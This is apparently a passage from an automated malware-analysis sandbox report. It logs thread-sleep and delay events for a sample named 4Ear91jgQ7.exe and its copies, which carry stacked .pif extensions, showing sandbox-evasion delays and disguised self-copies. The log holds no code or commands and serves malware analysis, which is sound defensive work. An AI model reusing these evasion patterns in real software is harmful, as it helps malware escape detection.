            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -595958s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -595826s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -595710s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -595532s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -595313s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -595032s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -594877s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -594735s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -594615s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -594453s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -594327s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -594187s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -594047s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -593874s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -593749s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -593614s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -593485s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif TID: 3924Thread sleep time: -593360s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -600000s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 3056Thread sleep count: 463 > 30
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -599844s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -599688s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -599484s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -599334s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -599141s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -598986s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -598846s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -598719s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -598577s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -598203s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -598000s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -597828s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 3056Thread sleep count: 886 > 30
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -597707s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -597578s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -597452s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -597340s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -597223s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -597093s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -596906s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -596797s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 2520Thread sleep time: -578422s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep count: 35 > 30
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -32281802128991695s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -600000s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 4292Thread sleep count: 2305 > 30
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -599871s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 4292Thread sleep count: 6730 > 30
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -599759s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -599643s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -599520s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -599379s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -599265s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -599153s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -599046s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -598937s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -598828s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -598718s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -598609s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -598499s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -598390s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -598254s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -598140s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -598031s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -597920s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -597812s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -597703s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -597593s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -597484s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -597375s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -597251s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -597109s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -596991s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -596890s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -596781s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -596672s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -596562s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -596452s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -596343s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -596234s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -596125s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -596015s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -595906s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -595796s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -595687s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -595578s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -595468s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -595359s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -595250s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -595140s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -595031s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -594922s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif TID: 5888Thread sleep time: -594806s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -16602069666338586s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -600000s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 3272Thread sleep count: 5773 > 30
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -599871s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -599754s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -599625s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -599516s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -599381s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -599234s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -599117s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -598995s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -598875s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -598765s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -598652s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -598469s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -597875s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -597688s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -597575s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -597462s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -597322s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -597203s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -597071s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -596922s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -596781s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -596647s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -596498s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -596373s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -596250s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -596136s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -595922s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -595674s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -595542s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -595413s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -595252s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -595094s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -594965s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -594797s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -594641s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -594510s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -594385s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -594277s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -594156s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -594027s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -593909s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -593793s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -593672s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -593546s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -593437s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -593328s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -593209s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -593078s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 3272Thread sleep count: 481 > 30
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -592969s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -592859s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -592750s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -592587s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -592476s >= -30000s
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif TID: 5296Thread sleep time: -592374s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\findstr.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\findstr.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 599828Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 599703Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 599594Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 599484Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 599375Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 599263Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 599156Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 599047Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 598938Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 598813Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 598688Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 598563Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 598344Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 598232Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 598125Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 598007Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 597882Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 597672Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 597522Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 597376Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 597250Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 597141Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 597031Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 596922Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 596813Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 596688Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 596563Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 596438Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 596328Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 596219Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 596094Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 595985Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 595860Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 595735Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 595610Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 595485Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 595360Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 595235Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 595110Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 594985Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 599563Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 599450Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 599266Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 599110Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 598945Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 598828Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 598712Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 598605Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 598500Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 598375Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 598219Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 598096Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597972Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597844Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597730Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597621Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597516Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597406Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597297Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597160Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597026Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 596862Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 596495Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 596359Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 596250Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 596141Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 596031Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 595922Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 595790Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 595665Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 595563Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 595438Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 595313Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 595188Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 595078Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 594969Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 594844Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 594735Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 600000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 599871
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 599749
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 599639
